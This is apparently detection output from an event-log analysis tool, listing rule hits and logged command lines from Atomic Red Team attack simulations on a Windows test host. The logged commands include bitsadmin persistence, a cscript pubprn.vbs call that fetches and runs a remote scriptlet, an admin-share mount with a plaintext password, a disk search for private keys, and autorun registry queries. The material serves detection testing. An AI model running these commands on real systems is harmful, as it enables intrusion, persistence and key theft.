+2019-07-19 23:48:30.807 +09:00,MSEDGEWIN10,1,medium,Bitsadmin Download,,rules/sigma/process_creation/win_process_creation_bitsadmin_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:30.807 +09:00,MSEDGEWIN10,1,medium,Monitoring For Persistence Via BITS,,rules/sigma/process_creation/win_monitoring_for_persistence_via_bits.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:30.900 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:30.917 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe  /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1  :  Path: C:\Windows\System32\bitsadmin.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:31.012 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /complete AtomicBITS""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:31.041 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe  /complete AtomicBITS  :  Path: C:\Windows\System32\bitsadmin.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /complete AtomicBITS""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:31.134 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /resume AtomicBITS""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:31.157 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe  /resume AtomicBITS  :  Path: C:\Windows\System32\bitsadmin.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /resume AtomicBITS""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:31.240 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:36.834 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "" script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:36.882 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cscript.exe  /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost  script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct  :  Path: C:\Windows\System32\cscript.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "" script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:37.264 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:41.050 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c "" net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:41.085 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd.exe  /c  net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c "" net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:41.109 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: net  use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator  :  Path: C:\Windows\System32\net.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd.exe  /c  net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:41.109 +09:00,MSEDGEWIN10,1,medium,Mounted Windows Admin Shares with net.exe,,rules/sigma/process_creation/win_net_use_admin_share.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:46.238 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:57.466 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""echo "" ""ATOMICREDTEAM > %%windir%%\cert.key""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:57.524 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c:\ /b /s .key | findstr /e .key""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:57.524 +09:00,MSEDGEWIN10,1,medium,Discover Private Keys,,rules/sigma/process_creation/process_creation_discover_private_keys.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:57.557 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe  /S /D /c"" dir c:\ /b /s .key ""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c:\ /b /s .key | findstr /e .key""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:57.557 +09:00,MSEDGEWIN10,1,medium,Discover Private Keys,,rules/sigma/process_creation/process_creation_discover_private_keys.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:57.570 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: findstr  /e .key  :  Path: C:\Windows\System32\findstr.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c:\ /b /s .key | findstr /e .key""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:48:57.570 +09:00,MSEDGEWIN10,1,medium,Discover Private Keys,,rules/sigma/process_creation/process_creation_discover_private_keys.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:31.690 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.150 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.180 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  query  HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.180 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.227 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.249 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.249 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.304 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.335 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.335 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.389 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.413 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.413 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.463 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.497 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.497 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.551 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.585 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.585 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.660 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.678 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.678 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.728 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.743 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.743 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.789 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.807 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.807 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.850 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.868 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.868 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.921 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.937 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.937 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.975 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.990 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.990 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
